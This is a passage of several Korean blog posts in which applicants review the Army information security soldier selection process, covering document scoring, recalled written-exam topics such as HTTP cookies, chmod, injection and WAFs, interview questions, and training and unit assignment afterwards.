참고로 필자는 좋았을 때는 학교 프로젝트를 통해 동아리원들로부터

인정받았을 때를 말했고,

힘들었을 때는 항상 늘 긍정적으로 생각하기 때문에 없다고 평소보다

살짝 더 미소를 머금고 대답했다.

면접관님은 웃음이 터지셨고 알았다고 나가보라고 하셨다.

정보보호병 2차 면접은

기술면접과 인성면접으로 나누어져 있다.

기술 면접은 보안의 대한 경험 이 중요하며,

자신만의 특별한 필사기 던져

필살기 안에서 질문이 나올 수 있도록 노력 한다.

인성 면접은 당황하지 말고 차분하게

자신의 의견을 말할 수 있도록 노력한다.

최종 합격

위 과정을 통해 결국 필자는 정보보호병 합격에 성공했다.

최종 점수는

57.5 점.. 36등 정말 아슬아슬했다.

1차랑 합산되어 평가됨으로 가산점을 절대 무시할 수 없다.

그래도 다행이다.

국방의 의무 잘 마치고 오겠습니다!

충성!

도움 주신 정재훈, 유재겸 선배님께 감사합니다.

728×90

면접 문항 및 질문 정리 (2021.01.28)

개요

군 문제는 대학을 진학함과 동시에 고민하게 되는 부분이다. 본인은 컴공으로 입학했을 때부터 전공을 살려 군 복무를 하는 방법을 알아봤었는데, 산업기능요원으로 빠지는 방법을 제외한다면 SW 개발병과 정보보호병이라는 두 병과가 있었다.

SW 개발병의 경우, 상대적으로 소수의 인원을 뽑고 무조건 좋은 곳(?)으로 배치되는 것 같다. 반면 정보보호병의 경우 상대적으로 많은(매년 150명 정도인 듯 하다) 인원을 선발하는 대신, 배치되는 부대에 따라 열악한 환경에서 근무하게 될 수도 있다고 한다. 하는 일 또한 상당히 차이가 있는데, SW 개발병의 경우 군 관련 SW를 유지/보수/개발한다고 하며, 정보보호병의 경우 CERT에 들어가서 관제 업무를 주로 하게 된다고 한다. 본인은 아직 입대는 커녕 합격도 하지 않은 평범한 대학생이므로, 두 병과에 대해 더 자세히는 잘 알지 못한다. ‘정보보호병 후기’와 같은 키워드로 검색하면 많은 자료가 있으므로 추가적인 정보를 원한다면 이미 다녀오신 분들의 후기를 찾아보는 것을 추천한다.

SW 개발병의 경우, 컴공이 ‘직접학과’로 분류되며 하는 일 또한 개발 업무이기에, 컴공이 ‘간접학과’로 분류되고 나에게 일 또한 생소한 정보보호병보다 매력적으로 느껴졌다. 그래서 2020년 11월의 SW 개발병 모집에 지원했었는데, 학년도 낮고 자격증도 정보처리기능사 하나였기에 떨어지게 되었다. 이 때 점수가 4점가량 모자랐었는데(컷 37, 본인 33), 3학년을 수료하며 정보처리산업기사까지 획득한다면 합격권에 들어올 것 같았다. 하지만 애초에 산업기능요원으로 빠지지 않고 육군을 가려는 이유가 빠른 군 문제 처리라는 장점에 있었기에, SW 개발병의 다음 회차 모집을 기다리지 않고 2020년 12월의 정보보호병 모집에 지원하게 되었다. (2021년 1월 면접, 2021년 3월 입대 예정)

사실 SW 개발병을 목표로 하고 있었던지라, 정보보호병에 지원해 준비하게 된 일은 다소 갑작스럽기도 했다. 내 전공 또한 정보보안이 아닌 컴공인지라 이쪽 내용에 대해서도 무지한 상태였다. 하지만 정보보호병 지원과 면접 관련 검색을 통해 수많은 블로그 글들과 후기들을 접할 수 있었고, 덕분에 무난하게 면접까지 마칠 수 있었던 것 같다. 본인 또한 가까운 미래에 정보보호병을 지원하고자 하는 다른 사람들에게 도움이 되고자 이 글을 작성한다.

블로그 글 중에서 제일 도움이 되었던 것들은 구체적이고 개인적인 경험이 담겨있는 글들이었다.

따라서 본인 또한 이러한 부분에 초점을 맞추어 후기를 남기고자 한다.

서류 지원

전체적인 평가는 다음 표와 같이 이루어진다:

전공학과 의 경우, 간접학과 2학년 수료로 16 점 을 받았다. (아직 수료가 아니었지만, 문의 후에 ‘수료예정증명서’를 제출하였다.)

의 경우, 간접학과 2학년 수료로 을 받았다. (아직 수료가 아니었지만, 문의 후에 ‘수료예정증명서’를 제출하였다.) 고교출석률 은 10 점 을 받은 듯 하다.

은 을 받은 듯 하다. 경력 은 정보보안/SW 관련 근무 경험, 동아리 활동 혹은 수상을 통해 인정받을 수 있는데, 급하게 지원하느라 동아리 활동 증빙 서류가 없어서 받을 수 있었던 2점가량을 놓쳤다. 하지만 ‘정보통신분야 기능경진대회(정부부처주관)’ 항목으로 고등학교 2학년 때 수상했던 ‘정보올림피아드 공모전’ 은상을 등록하여 6 점 을 챙길 수 있었다.

은 정보보안/SW 관련 근무 경험, 동아리 활동 혹은 수상을 통해 인정받을 수 있는데, 급하게 지원하느라 동아리 활동 증빙 서류가 없어서 받을 수 있었던 2점가량을 놓쳤다. 하지만 ‘정보통신분야 기능경진대회(정부부처주관)’ 항목으로 고등학교 2학년 때 수상했던 ‘정보올림피아드 공모전’ 은상을 등록하여 을 챙길 수 있었다. 자격증은 정보처리기능사가 있다. 두시간 공부해서 딴 자격증이 무려 16 점이다.

합산하여 16 + 10 + 6 + 16 == 48 점의 서류점수이다. 서류 지원 결과는 다음과 같았다:

놀랍게도 정올 공모전 없이도 합격권이다. 대부분 대학교 2학년 정도에 자격증을 하나 따고 지원하는 듯 하다. 다만 시상내역이 있었기에 높은 선발순위를 받을 수 있었다. 서류점수는 최종 점수에도 반영이 되기에, 합격을 하게 된다면 이 시상내역 덕분일 것 같다.

이번 달에는 20명의 정보보호병을 뽑기에, 2배수인 40명이 면접을 보게 된다. 이번 달 전체 지원자는 128명이었기에, 6.4대 1로 경쟁률이 다소 높은 편인 듯 하다.

면접

배점 100점 중 30점에 해당하는 면접이다.

사실상 이 후기를 쓰게 된 이유가 면접에 대한 정보를 남기고자이다.

본인은 면접을 준비하는 과정에서 최소 10개의 후기는 본 것 같은데, 덕분에 이미 겪어본 듯한 착각 속에서 편하게 면접을 진행할 수 있었다. 사실 면접을 진행하면서도, 블로그에 후기를 남길 생각에 문항들을 최대한 자세히 기억해두려고 노력했었다. 덕분에 이 후기를 읽는 님들은 면접 문항 복원률 100%의 풍성한 후기를 보게 될 예정이다.

참고로 면접은 1. 객관식 시험, 2. 인성/적성 면접, 3. 기술면접의 순서로 구성된다.

차편을 예약하거나 시간 계획을 세울 사람들을 위해 알려주자면, 시험은 1시부터 15분간 응시하며, 면접은 1시 25분부터 2시 정도까지 대기하였다. 본인이 9번이고, 35분 걸렸으니, 인당 4분가량씩 걸린다고 보면 될 듯 하다.

면접 전

정보보안에 대해서는 아는게 거의 없는지라 공부를 좀 했다. <정보 보안 개론> 책을 사서 전날에 1회독하고 갔는데, 어느 정도 도움이 됐다. (다만 저 책은 내용이 생각보다 별로라고 느껴져서 딱히 추천하지는 않는다.)

다른 면접 후기들을 읽으며 시험과 면접 예상문제에 대한 준비를 했다.

면접 당일

먼저 면접장까지 가는 과정과 대기하는 과정 얘기를 짧게 하겠다.

본인은 서울역에서 대전역까지 KTX를 탔고, 지하철을 이용해 면접 장소인 병무청까지 이동했다.

오후 1시 면접이었는데, 선착순으로 번호표를 접수하기 때문에 일찍 갈수록 좋다. 본인은 11시에 도착하였고, 9번째 번호표를 뽑았다.

면접장은 위의 오른쪽 사진에 나온 건물이 아닌, 건너편 건물(도로에서 봤을 때 오른쪽)에 위치한다. 주차장 안쪽으로 돌아 들어가도록 되어있는데, 도착하면 2층에서 번호표를 뽑고 대기하게 된다. 어디 나가서 밥 먹기도 귀찮았고 공부도 해야할 것 같아서 그냥 1시까지 계속 앉아있었다.

객관식 시험

10 문항이고, 4지선다이다. 면접장에서 얼핏 들은 내용에 의하면 무려 전체 면접 배점의 절반(50%)이라고 한다.

문항은 다음과 같다:

1. 클라이언트에서 서버로 쿠키를 보낼 때 사용하는 HTTP 헤더는?

-> set-cookie와 cookie 등의 선지가 있었다.

2. 다음 중 전자상거래와 관련이 없는 것은?

-> ebXML, SET, SSL, EMV가 선지였다.

3. chmod 명령어의 특징이 아닌 것은?

-> 파일과 디렉토리를 rename할 수 있다는 선지를 선택했다.

4. HTTP 오류 코드와 그 뜻을 알맞게 짝지은 것이 아닌 것은?

-> 200, 403, 404, 500이 나왔다.

5. 다음 중 입력값에 대한 검증 / 특수문자 처리를 하지 않은 것과 무관한 공격 기법은?

-> injection 기법 두세 종류와 ‘watering hole’이 나왔다. ‘watering hole’을 골랐다.

6. 리눅스 방화벽에서 ping에 대한 응답으로 ‘destination unreachable’을 리턴하기 위해 설정해야 하는 플래그는?

-> DENY, REJECT 등이 있었다. REJECT를 골랐다.

7. 다음 화면은 어떤 명령어의 실행 결과인가? (ping 실행 화면)

-> 답이 ping이다 ㅋㅋ

8. 다음 중 IPS에 대한 설명으로 올바르지 않은 것은? (그냥 IPS가 아니라 어플리케이션 뭐시기 IPS이었는데 기억이 안난다)

9. 침해 단계의 심각성?에 따라 나열할 때, 빈칸에 들어갈 단어들은? (emergency에서 debug까지 나열되어 있었다.)

-> alert, info 등이 있었는데, 그냥 영어 할 줄만 알면 나열 가능하다.

10. 침입이 있는데, 없다고 판단하는 경우는 뭐라고 하는가? (True/False Positive/Negative 중 선택)

-> False Negative라고 답했는데, 맞을지 모르겠다.

1, 2, 4, 5, 6, 8은 찍었고, 9, 10은 추론했고, 3, 7은 확신을 갖고 답했다.

시험 종료 후 구글링을 해본 결과, 2, 4는 확정적으로 틀렸으니, 8개 혹은 7개를 맞혔을 것이다.

이 중 정보보안개론을 공부하여 도움이 되었던 문항은 2번, 5번 두개밖에 없었는데 심지어 2번은 틀렸다 ㅋㅋㅋ

음… 분명 공부를 해야 하는 것은 맞는 시험인데, 어쩌다 보니 대량으로 찍게 되었다. 그래도 찍은 문항 수에 비해 많이 틀린 것 같지는 않아서 다행이다.

인적성 면접

인적성 면접과 기술 면접의 순서는 정해져 있지 않다. 본인은 인적성 면접을 먼저 보게 되었다.

면접 내용에 대해 이야기하기 앞서서 잠깐 하고 싶은 말이, 면접 대기 queue를 왜 그렇게 해놓았는지 모르겠다. 진행해야 하는 면접은 각각 4분 정도씩의 두개인데, 제일 효율적으로 진행하는 방법은 pipelining 하듯이 그냥 하나의 줄을 세워서 면접 1, 면접 2를 순서대로 진행하는 방법일 것이다. 이렇게 하면 4분마다 1명의 throughput이 된다. 하지만 면접장에서 진행했던 방법은, 면접 1을 보는 줄과 면접 2를 보는 줄을 분리시켜서, 일부는 면접 1의 줄에 먼저 서게 하고, 나머지는 면접 2의 줄에 먼저 서게 한 것이다. 각 면접을 마친 사람은 다시 자신이 아직 보지 않은 면접의 줄에 합류하게 된다. 왜 하는건지 알 수 없는 이런 면접 대기 방식 덕분에, 각 줄에 대기하는 사람 수가 늘어났다 줄어들었다 하면서 앉을 자리가 부족했다가 남았다가를 반복하게 되었다. 자리가 남았을 때, 대기 줄에 가서 앉아야 할지의 여부 또한 눈치싸움이 되었다. 예를 들어 면접 1의 대기 줄에 빈자리가 났다. 하지만 여기에 아직 면접을 보지 않은 사람이 앉아버리면, 현재 면접 2를 먼저 보고 있는 사람이 면접이 끝나고 나왔을 때, 앉을 자리가 없어져 버린다. 이렇게 진행하면 throughput이 늘어날 것이라고 생각한 모양이다;;

면접은 젊은 남성 면접관님이 진행하셨고, 매우 친절하게 진행하려 노력하는 것이 보였다.

그럼 면접 내용이다:

=> 정보보호병에 지원한 이유는 무엇인가?

=> 정보보호병이 무슨 일을 하는 것인지 알고 있는가? (관제 업무인 것을 알고 가면 된다.)

=> 시설이 생각하는 것보다 열악할 수 있다. 괜찮겠는가? (뭐 어쩌겠어… ㅋㅋㅋ)

=> 근무 스케줄이 빡셀 수 있고, 8시간씩 모니터를 봐야 한다. 괜찮은가? (네…)

=> 정보보호병은 간부와의 접촉이 타 병과보다 많다. 부당한 지시가 내려올 경우 어떻게 하겠는가?

=> 사회활동 / 봉사활동 경험이 있는가?

=> 대한민국의 주적은 누구인가?

=> 가족관계가 어떻게 되는가?

본인의 대답은 개인적인 내용이 많으므로 생략하겠다. 사실 면접을 대기하면서 긴장이 안되는 듯 해서 이게 정말 긴장을 안하고 있는건가 싶었었는데, 면접실에 들어가보니 정말 긴장을 안하고 있더라. 엄청 자연스럽게 대답을 잘 할 수 있었던 것 같고, 면접관님은 (계속 긴장을 풀어주려고 노력하시는 것이겠지만) 나무랄 것 없이 완벽하게 대답했다고 말씀하셨다.

기술 면접

다른 후기에서 말하기를, 필기시험을 보게 된 이래로 기술 면접에서 기술적인 내용을 덜 물어본다고 한다.

실제로 질문받은 내용은 본인의 경험 관련된 것이 대부분이었다.

기술 면접은 여성 군인분이 진행하셨다.

그럼 면접 내용이다:

=> 정보보호병에 지원한 이유는 무엇인가? (다시 질문받았다)

=> 수상 경력이 있다. 어떠한 내용인가?

=> 생각하는 것 만큼 멋진 일이 아닐 수 있다. 알고 있느냐?

=> 최근 관심 있는 보안 분야/이슈가 있느냐?

=> 합격할 경우 (공부) 계획이 있느냐?

수상 경력 관련 질문에 대답할 때에는, 대전에서 진행되었던 정보올림피아드 캠프 당시를 떠올리며, 그 이후 3년 반만에 대전에 왔다고 설명하며 자연스럽게 당시 출품작에 대한 설명을 진행하였다. 관련된 추가 질문들(e.g. 어떤 언어를 썼느냐)을 대답하였고, 자연스럽게 다음 질문들로 넘어갔다.

관심 있는 보안 이슈는, 2018년의 Meltdown / Spectre 취약점 이야기를 했다. 학교에서 배운 컴퓨터구조 내용(branch prediction 등)과 엮어서 대답하니 흡족해 하셨다.

합격할 경우의 계획은, 군대에 가서 공부하고 싶은 분야들(정보보안 관련 + 수학)로 대답하였다.

면접 이후

그냥 집에 가면 된다. 코로나 때문에 2주가 연기되기도 했던 면접이라 정말 한참동안 기다렸었는데, 깔끔하게 해결하고 나니 마음이 한결 가벼워졌다. 서류가 6등이고 면접이 무난했던지라, 합격을 기대하고 있다.

결과

결과는 아직 나오지 않았다. 합격 여부가 발표되는대로 이 글에 추가하도록 하겠다.

UPD 1) 결과가 나왔다 – 시험에서 두 문항을 틀리고, 면접에서 아주 작은 감점 정도가 있었다면 설명되는 점수이다:

UPD 2) 정보보호병은 후반기 교육 2주차에 자대배치 결과를 받는다. 훈련소에서 면접을 보는 일부 부대 선발 인원을 제외하면, 나머지 인원의 배치는 편제가 비는 사단 이상급 부대로 완전히 무작위로 이루어진다.

본문에 쓰지 못한 내용에 대해 추가적으로 궁금한 적이 있다면, 개인적으로 연락주세요!!

정보보호병 면접 후기

2020-07-20 육군 정보보호병 면접

보통 2학년이 끝나고 정보보호병을 가는게 일반적이지만

bob 9기에 떨어진 충격으로 2학년 1학기를 마치고 지원하게 되었다.

서류전형에서 획득한 가산점은 다음과 같다.

정보보호학과 2학년 1학기 수료 = 16점

고교 출석률 결석 0일 = 10점

KISA 추천 동아리 활동 1년 이상 = 4점

자격증 여부 없음(기본) = 10점

최종 16+10+4+10 = 40점

서류에서 받을 수 있는 점수는 최대 70점으로

전공학과 수료기간이 길거나

대회 수상 경력이 있거나

관련 자격증을 가지고 있다면,

높은 배점을 받을 수 있다

( KISA추천 동아리 – Security Factorial 가산점만으로도 붙을 수 있을까! )

* 2021년 이후로 서류심사 부분 ‘경력’ 이 수정됨에 따라

더이상 동아리활동 가산점은 없습니다

병무청에서 확인가능

필기+면접으로 28위 안에 들어야 정보보호병을 갈 수 있다!

( * 회차마다 다르며 기준이 조금씩 변경되므로 잘 확인하자)

그리고 1차를 합격하게 되면 2차 면접을 보러가게 되는데

면접장에서는 필기 시험과 면접을 보게된다.

인생에서 3번째 면접이였다…

도착하고나서 번호표를 뽑게 되는데

꼭 꼭 꼭 면접 시간 2시간~1시간 30분 전에 가는걸 추천한다

이 번호 순서대로 수험번호 인증과 면접을 하게 된다.

면접이 1시 시작이라고 해서 30분전에 갔다가는

대기번호 40번대를 받고 면접 대기 2시간동안 멍때리는 수가 있다.

차라리 필기시험 공부를 2시간 하는게 1억 5천만배 낫다고 생각한다.

# 필기

참고로 나는 필기시험 준비를 인터넷 검색을 통해 대충 공부한 관계로

(검색창에 정보보호병 필기 검색해서 나온 문제 10개만 보고 갔다.)

10문제 중에 단 2문제만 이해한 사람이다.

도착한 사람들은 시험전에 책과 모의시험지를 통해 공부를 하고 있었는데

나는 그러한 정보가 없었기에 친구와 수다떨다가 시험을 치뤘다.

주로 리눅스와 관련된 문제와

(ex. 다음 중 해당 폴더와 관련된 내용으로 올바르지 않은 것은? 4지선다 형식)

네트워크 문제 + 보안관련 문제가 나왔다

(ex. 네트워크 7계층 + TCP 4계층관련 문제, 정보보안기사 문제)

사용해보지도 않은 것들이 나와서 깔끔히 말아먹었다.

그 중에 기억나는 문제 하나가 있다면

비정상적인 일이 발생할 수 있는 가능성을 뜻하는 용어를 고르시오.

① 위협 ② 위험 ③ 취약점 ④ ???

답은 ②인데 이런 용어설명 또는 이론을 제대로 찾아본 적이 없어서 당황했다.

취약점도 비정상적인 일이 발생할 수 있는거 아냐?

# 면접

동아리 면접말고는 면접 경험이 없는 나에게 제일 부담되었다.

그래서 딱 하루동안만 준비했다 (?)

각종 검색을 통해서 면접 질문들을 적어보고 답변을 작성하는 식으로 준비했다.

그런데 이번 면접에서는 질문이 너무 없어서 당황했다.

인성 면접과 기술 면접, 이렇게 2개를 보게 되는데

첫번째 인성 면접에서는 면접관님께서 정보보호병이 힘들거라는 이야기만 해주시다가

“정보를 찾아봐서 알겠지만 훈련소 수료이후에 무작위로 배치되게 되는데 사단급에 배치될 경우에

당신이 생각하는 정보보호병 업무와는 다른 일을 하게 될 수도 있다. 괜찮은가?”

“정보보호병 인원이 적어서 힘들 수도 있다. 괜찮은가?”

“북한에 대해 어떻게 생각하는가?”

정확히 3개의 질문과 함께 인성면접은 종료되었다.

대부분이 단답형식으로 말할 수 밖에 없는 속도로 말씀하셨다.

두번째 기술 면접은 인성 면접보다는 많은 질문을 해주셨는데

주로 자기소개 내용과 가산점을 받은 활동에 대해 질문을 하셨다.

“왜 정보보호병에 지원하게 되었고, 꼭 수료하고 싶은 이유가 있는가?”

“정보보호병이 되면 다양한 경험을 할 수 있을 수도 있지만,

그렇지 못한 경우가 발생할 수도 있다. 괜찮은가?”

“정보보호병은 인원이 적기 때문에 1~2명씩 휴가를 나가기만해도 타격이 크다.

때문에 휴가가 취소될 수도 있고, 때문에 밤샘을 자주 하게될 것이다. 자신있는가?”

“관심있어하는 보안 분야는 어떤 분야인가?”

“현재 동아리는 어떤 활동을 하는 동아리인지 설명할 수 있는가?”

“동아리 내에서 프로젝트를 해본 경험이 있는가?”

이 외에도 대답에 대해 간단한 꼬리질문이 이어졌다.

그리고 한가지 특징은 계속 눈을 마주치면서 질문을 하셨다.

공통적으로는 사단급 배치에 대해 감수할 수 있겠느냐 라는 질문과

주로 관제업무이기 때문에 밤샘을 할 수 있겠느냐 라는 질문을 해주셨다.

나는 사단과 군단차이를 몰라서 찾아봤었는데

사단은 군단보다 작은 규모이고,

정보보호체계가 제대로 수립되지 않아서

정보보호병으로써의 역할을 다하지 않는다고 한다.

* 2021-01-02

정보보호병 동기들마다 면접 질문이 달랐다고 한다

(용어의 개념 질문을 받은 동기가 있는 반면,

잘할 수 있지? 라는 질문만 받은 동기도 있었다)

이후에 대전까지 온 돈이 아까워서 은행동을 뽈뽈 돌아다니다가 집에 갔다.

은행동에는 성심당 본점이 있는데 유명한 빵집이라고 한다.

거기 튀김 소보루가 맛있었다.

빵은 사진찍을 생각도 못한채 다 먹어버려서 사진이 없다.

정보보호병 후기

지난 포스팅에서 정보보호병 키워드로 검색을 해서 들어온 분들을 보고

짧게나마 정보보호병 면접 부터 생활을 간단하게 적어보려합니다!!

1. 정보보호병 서류

많은 분들이 정보보호병은 하고싶은데

괜히 겁 먹어서 지원을 안하시는 분들이 많더라고요.

일단 다들 제일 궁금하실 서류 전형!!!

정처기를 따야하나 보안기사를 따야하나 이런 질문들을 많이 하실텐데

저는 자격증이 면허도 없고 아무것도 없습니다 ㅎㅎ..

그때는 대회 경험도 전무해서 가산점받을 항목이 딱히 없었어요

가산점이 붙을만한거는 사이버보안학과를 재학중인거? 그거밖에…(1점이었나 2점이었나..)

그러니까 다들 자신감을 가지고 지원하셔도 좋을 거 같아요!

물론 그때 동기들을 보면 소소하게 자격증을 가지고 있던 친구들이 있긴 했어요…

결론은 자격증이 있으면 물론 붙을 확률이 높지만 없어도 해볼만하다!

2. 정보보호병 면접

저때는 아마 대전에서 시험을 치뤘습니다.. 친구랑 같이 면접을 보러가서

카페에서 같이 공부하다 들어갔는데 최대한 빨리 들어가시는게 좋아요.

들어온 순대로 면접을 진행해서 저희는 맨 마지막즈음에 면접을 봤는데

한 9시? 쯤 면접이 끝났어요ㅠㅠ

아 면접전에 필기를 보는데 문제가 그때는 생각보다 어렵지 않았어요(18년 3월 군번 기준)

저는 인터넷에 정보보호병 면접을 쳐서 기출 위주로 공부했는데

거의 다 기출에서 나왔던 것 같아요 기억나는 문제는

csrf, xss, 블록체인의 정의, rwx 계산, find 명령어, vi 이런 문제가 나왔어요

한번 인터넷에 면접 후기를 검색해 보니까 다양하게 나오더라고요

그걸 위주로 공부하시면 될 것 같아요!

그전에 리눅스 명령어에 대해 조금 알아두시면 좋을거 같아요.

면접의 경우 애국심을 묻는다는지 보안윤리 이런걸 위주로 물어봤어요.

기술또한 몇개 물어봤는데 별로 기억 안나는걸 보니 어렵지 않았던거 같아요

3. 훈련소 – 기무ㅅㅏ령부 면접

입대를 준비하시는 분들은 기무사령부에 대해 잘 모르실 거에요

어딜 가시든 사령부로 가거나 특수하게 뽑는 장소들이 다 좋은 거에요

저희때는 정보보호병이 40명? 있던걸로 기억나는데 거기서 랜덤으로 20명을 차출해서

면접을 진행했어요. 그때 말만 잘 하시면 꽃길이 펼칠꺼에요.

4. 입대 후 정보통신학교

저때는 꿀보통신학교로 불렀는데 지금은 어떤지 모르겠네요

학교 다니는 것과 비슷하게 흘러가요. 강의실가서 수업듣고 청소하고 불침번하고

아주 간단해요.. 거기에 코인 노래방이랑 오락실도 있었던 걸로 기억해요 ㅎㅎ

그리고 학교에서 뭘 배우냐! ftz를 그대로 갖다 썼던 거 같아요. 불법 아닌교??

같은 네트워크를 쓰다보니 어떤 친구들은 채팅 프로그램 만들어서 얘기도 하고 ㅋㅋㅋ

보안을 같이 공부하는 친구들과 같이 4주? 동안 얘기하며 재밌게 놀 수 있어요

아직도 그 친구들 6명? 이랑은 연락해요. 좋은 인맥이 될 수 있으니 친하게 지내시는게 좋아요

5. 자대 배치

정보보호병이 무슨 업무를 하는지 궁금하실거에요

저희 부대 같은 경우에는 CERT병, 개발병, 전산병(나) 이렇게 나뉘었는데요

CERT의 경우 상황병으로 보통 생각하시는 관제같은 임무를 수행한다 생각하시면돼요.

정보통신학교에서 배운 IPS 같은 걸 다루며 이것저것 한답니다.

개발병의 경우 각종 보안 프로그램을 개발했던 걸로 기억해요. 다시 입대한다면 저는 개발병 할래요

마지막으로 저는 운 없이 전산병으로 떨어졌는데요. 각종 네트워크 업무를 수행했어요

그래도 그 속에서 네트워크 관련 여러 지식들도 배우고 군 내에서 프로그램도 제작해보고

좋은 동기들과 대회도 나가 상도 타고! 아주 좋은 군 생활이었어요

다들 좋은 결과 바래요!!

[2020.06.15] 육군 정보보호병 면접 후기

지원 계기

정보보호병에 지원하기 전까지 나는 산업체를 알아보고 있었고 괜찮은 한 스타트업에서 병역특례를 받는 것을 조건으로 입사했었다. 하지만 해당 회사에서 1달 정도 근무하던 날 필자에게 TO를 줄 수 없다는 말을 전했고, 진짜 이날 모든 것을 다 잃은 것 같았지만 회사를 나올 수 밖에 없었다..

회사에서 바라는 인재는 바로 사용 가능한 인력이다. 이러한 수준의 실력이 없고서야 현역으로 산업체 근무는 어렵다고 생각한다.

회사를 나온 날이 마침 월급날이었고 돈을 받았다는 기쁨과 병특을 놓쳤다는 상실감에 쌓여있었다. 이렇게 병특을 받을 수 있을 지 불확실한 상황에서 더 군대를 미루다가는 복학 시기도 놓칠 것 같아 정보보호병으로 지원하게 되었다.

준비 기간

대학교를 재학하는 동안 백엔드에 주력한 나머지 정보보안 분야를 비롯한 이론적인 부분이 많이 취약하다고 생각하였다. 그래서 시험 문제와 면접에 대한 걱정이 들어 블로그 후기들을 찾아보았고 해당 글들의 문제복원과 면접내용을 찾아보았다. 정보보안기사를 공부하는 것을 추천하는 분들이 많았고, 그래서 정보보안기사 공부를 하기로 마음을 먹게 된다.

하지만 계속되는 코로나 사태로 인해 병무청은 대부분의 병역 모집전형을 취소하거나 일정을 변경하였다. 정보보호병은 2주 정도 미루게 되는데.. 덕분에 내 공부기간도 자연스럽게 연장되었다. 결국 3주에 걸쳐 정보보안기사를 공부하며 TIL에 정리하였고 7회의 시험문제를 풀어 오답노트까지 정리하였다.

실제로 이러한 공부는 아래에 서술한 필기 시험과 면접에 많은 도움이 되었으며, 블로거 분들의 후기도 많은 도움이 되었다.

필기 시험

면접을 보기 이전에 15분간 필기시험이 진행되었다. 아래는 기억나는데로 시험 문제를 복원한 것이다. 시험을 본 직후가 아닌 다음날에 기억을 짜내는 중이라 너무 힘들었다. 다음부터는 미리미리 블로그 글을 작성하도록 하자…

문제

기억이 나지 않는다. strcpy 대신 strncpy를 사용하는 이유

버퍼 오버플로우 NMS가 확인할 수 없는 것

호스트의 CPU 점유율 윈도우 공유 폴더 취약점(Null Session)

IPC$ TCP에서 클라이언트의 버퍼 오버플로우를 막기 위한 것

흐름 제어 crontab과 관련된 문제 사용자 인증 관련 문제

최대 권한 다음 로그는 어떤 공격인가?

랜드 공격(Land Attack) 디지털 포렌식에서 우선적으로 분석해야 하는 것

레지스터 웹 대상으로 이루어지는 공격 시도를 막는 것

웹 방화벽(WAF)

면접

시험이 끝난 직후 면접 대기실로 이동하였다. 면접장의 두 군데에서 치루어졌으며 블로그 후기와는 달리 1:1 면접 으로 진행되었다.

1차 면접

1차 면접에서는 기술과 관련된 질문이 주를 이루었다.

인사 지원 동기 어디 학과에 재학중인가? 정보보호병이 어떤 일을 하는 곳인지 아는가? 보안관제에는 어떤 업무를 하는가? IPS에 과정에 대해서 잘 아는가? 잘 몰라서 모른다고 답했다… 보안에 관심을 가지게 된 계기 블록체인과 암호화폐에 관심을 가지면서 암호학에 관심을 가지게 되었음 블록체인 기술에 대한 질문 블록체인의 무결성과 관련된 질문 블록체인이 어떤 분야에서 활용될 수 있는가?

2차 면접

1차 면접이 기술 관련된 질문이 주를 이루었다면 2차에서는 인성을 위주로 질문하였다.

인사 지원 동기 가족 관계 우리나라의 주적은? 오늘(6.15)이 무슨 날인지 아는가? 남북공동선언을 묻는 질문이었는데 필자는 잘 모르겠다고 대답했다… (이송합니다) 본인이 다른 사람보다 어필할 점이 있다면? 회사에서 근무한 경험을 어필하였다. 코딩을 할 수 있는 계기가 없을지도 모르는데 괜찮은가? 군부대 내에서 코딩이 악용될 가능성도 있는데 본인은 어떻게 할 것인가?

후기

실제로 면접과 시험을 보고 오니 예상보다는 많이 쉬운 편이었다… 내가 다른 블로거 분들의 정보보호병 모집 후기를 보았을 때는 이전 회차 필기문제와 면접이 어렵다고 생각했는데 말이다. 게다가 압박면접마저 있다는 얘기가 있었지만 내가 느끼기엔 편안한 분위기에서 진행되었다고 생각한다. 사실 뭐 어렵기를 바랬던 건 아니지만 3주를 열심히 태울 정도로 준비했어야 했나를 생각해보면 그것은 아닌 거 같다.

그렇다고 공부한 것이 도움이 되지 않는다는 말이 아니다. 공부를 하지 않았다면 시험 문제를 제대로 풀지도 못했을 뿐더러 면접도 제대로 보지도 못했을 것이다.. 만약 정보보호병을 지원하고 싶다면 1-2주 정도 빡세게 정보보안기사를 공부하기를 바란다. 필자의 경우에는 코로나로 인한 일정 연기가 이루어졌고, 하는 수 없이 공부를 더 많이 하게 되었다. 의도한 바는 아니었지만 3주 가량 보안에 관한 지식이 늘었고 보안기사 시험도 필기는 통과할 수 있는 정도가 되었다. 이번에 이렇게 공부한 김에 정보보호병을 나올때 쯤에는 보안기사도 따야겠다는 새로운 목표도 생겨났다.

이후 정보보호병으로 근무하게 되면 일의 강도는 어떨지, 어떤 작업을 맡게 될지 궁금하다. 알아보기로는 절반정도는 군단이나 사령부에 배치되고 나머지는 사단에 배치된다는데… CERT가 잘 운영되는 곳으로 배치되어 많은 것을 배울 수 있는 기회가 있다면 좋겠다.

2020.09.21 육군 정보보호병 면접 후기

코로나 사태로 인해서 2020.09.03이였던 정보보호병 면접이 2020.09.21로 미뤄지게 되었다.

이번 80회차 정보보호병은 14명을 모집하고, 1차 서류평가에서는 2배수인 28명을 뽑았는데, 나는 그 중에서 상위권에 있었다.

2차 면접평가는 대전.충남지방병무청에서 하고 1시까지 도착해야 하지만, 정보보호병 여러 후기를 찾아보고 일찍 가는게 좋다고 해서

조금 일찍 출발했다.

먼저, 병무청에 도착했을 때 시간은 11시 30분 쯤이였다. 병무청 쪽으로 가면 ‘전문특기병 면접하는 장소’ 대충 비슷하게 팻말이 붙어있는데, 따라 들어가서 보니 면접자들은 2층에 면접 대기실에서 대기하라고 적혀있어서 면접 대기실로 들어가서 번호표를 뽑았다. 일찍 왔다고 생각했는데도 몇명이 먼저 와 있었다.

면접 대기실에서는 계속 미리 준비한 대답들을 보고 있었고, 12시 30분 쯤에 코로나 관련 문진표를 작성하고 체온을 쟀다. 그러고 나서도 30분동안 계속 대기하고 있었다.

1시가 되어서 면접 대기실에서 정보보호병 시험지를 배분했고 약 15분간 정보보호 관련 문제를 풀었다. 문제는 10문제 였고 난이도는 정보보안기사, 산업기사를 공부하면 무난하게 풀 수 있는 문제들이였다.

기억나는게 많지는 않지만, 밑에 있는 수준 정도로 문제가 나왔다.

공개 키 원리

iptables

http 상태 코드

해킹 기법 문제

디지털 포렌식의 5대원칙

